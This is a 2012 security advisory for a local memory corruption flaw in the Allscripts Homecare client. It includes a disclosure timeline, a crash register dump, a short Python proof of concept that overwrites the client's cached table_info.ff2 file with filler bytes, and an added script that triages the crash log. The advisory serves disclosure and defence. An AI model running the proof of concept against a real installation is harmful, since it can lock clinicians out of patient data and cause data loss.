
Allscripts Homecare Client Local Memory Corruption

Posted Oct 26, 2012
Authored by G13

Allscripts Homecare client versions 6.1.0 and 7.0.1 suffer from a local memory corruption vulnerability.

tags | exploit, local
SHA-256 | e61dd63f1038ddb7e663470bfe50f0750075133ada0a3baaf17a8d05dad3e126

# Title: Allscripts Homecare Client Local Memory Corruption table_info.ff2
# Date: 10/25/12
# Author: G13
# Software Link: http://www.allscripts.com/en/solutions/post-acute-solutions/homecare/show/overview.html
# Version: 6.1.0, 7.0.1
# Category: Application (local)
# Tested on: Windows 7 Pro 64 Bit
# dc585

###### Introduction ######

Allscripts Homecare is an industry leading home care system designed
to improve clinical quality of care, financial
performance, and operational control for large, integrated home care
organizations and small home care companies.
Business, clinical, and scheduling functionality for multiple lines of
business—home health, hospice, and private
duty are combined seamlessly in one integrated home care software system.

###### Report Timeline ######

12/22/11 - Discovery
01/12/12 - Vendor Notification
10/25/12 - Disclosure

###### Exploit Technique ######

Local

###### Details ######

A Memory Corruption vulnerability was detected in Allscripts Homecare
6.1.0. It is triggered when the client processes a corrupt .ff2 file
in the program's cache, which causes an access violation. The specific
file is table_info.ff2. The cache is where a local copy of patient and
system data is stored and made accessible to users. Corrupting it will
deny users access to the program and may cause a loss of data.

Other versions are possibly affected.

###### Exception Log ######

EAX 00000000
ECX 00184646
EDX 41414141
EBX 006E994F MHC.006E994F
ESP 0018F244
EBP 0018F284
ESI 006E994F MHC.006E994F
EDI 00000000
EIP 004040AF MHC.004040AF
C 0 ES 002B 32bit 0(FFFFFFFF)
P 1 CS 0023 32bit 0(FFFFFFFF)
A 0 SS 002B 32bit 0(FFFFFFFF)
Z 0 DS 002B 32bit 0(FFFFFFFF)
S 0 FS 0053 32bit FFFDD000(FFF)
T 0 GS 002B 32bit 0(FFFFFFFF)
D 0
O 0 LastErr ERROR_COMMITMENT_LIMIT (000005AF)
EFL 00010206 (NO,NB,NE,A,NS,PE,GE,G)
ST0 empty 0.0
ST1 empty 0.0
ST2 empty 0.0
ST3 empty %#.19L
ST4 empty 0.0
ST5 empty 0.0
ST6 empty 0.0
ST7 empty %#.19L
3 2 1 0 E S P U O Z D I
FST 1020 Cond 0 0 0 0 Err 0 0 1 0 0 0 0 0 (GT)
FCW 137F Prec NEAR,64 Mask 1 1 1 1 1 1


###### PoC ######

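#!/usr/bin/python

# Overwrite the client's cached table_info.ff2 with filler bytes.
# Raw string: otherwise "\t" in "\table_info.ff2" is read as a tab.
path = r'c:\program files (x86)\misys\homecare\client\cache\table_info.ff2'
f = open(path, 'w')
f.write('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA')
f.close()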
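
A triage sketch for the Exception Log above, added here as an example and not part of the original advisory: it parses the register lines and reports which registers hold the PoC's fill byte (0x41) and whether EIP still points into the MHC module. The function names are assumptions of this example, and the register lines are copied from the log on this page.

```python
import re

# Register lines copied from the Exception Log section of this advisory.
EXCEPTION_LOG = """\
EAX 00000000
ECX 00184646
EDX 41414141
EBX 006E994F MHC.006E994F
ESP 0018F244
EBP 0018F284
ESI 006E994F MHC.006E994F
EDI 00000000
EIP 004040AF MHC.004040AF
"""

# "NAME VALUE [annotation]", limited to the 32-bit general registers and EIP.
REG_LINE = re.compile(
    r"^(EAX|ECX|EDX|EBX|ESP|EBP|ESI|EDI|EIP)\s+([0-9A-Fa-f]{8})(?:\s+(\S+))?\s*$"
)


def parse_registers(log):
    """Return {name: (value, annotation)} for each register line in the log."""
    regs = {}
    for line in log.splitlines():
        m = REG_LINE.match(line.strip())
        if m:
            regs[m.group(1)] = (int(m.group(2), 16), m.group(3))
    return regs


def filled_with(regs, fill):
    """Names of registers whose four bytes all equal the input fill byte."""
    pattern = int.from_bytes(fill * 4, "big")
    return sorted(name for name, (value, _) in regs.items() if value == pattern)


def triage(log, fill=b"A", module="MHC"):
    """Summarise how far the file contents reached at the time of the fault."""
    regs = parse_registers(log)
    eip_value, eip_note = regs["EIP"]
    return {
        "input_in_registers": filled_with(regs, fill),
        "eip_is_input": eip_value == int.from_bytes(fill * 4, "big"),
        "eip_in_module": bool(eip_note and eip_note.startswith(module + ".")),
    }


if __name__ == "__main__":
    print(triage(EXCEPTION_LOG))
```

For this log the result shows file data in EDX while EIP is still an address inside MHC, which matches the advisory's description of an access violation while processing the file.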

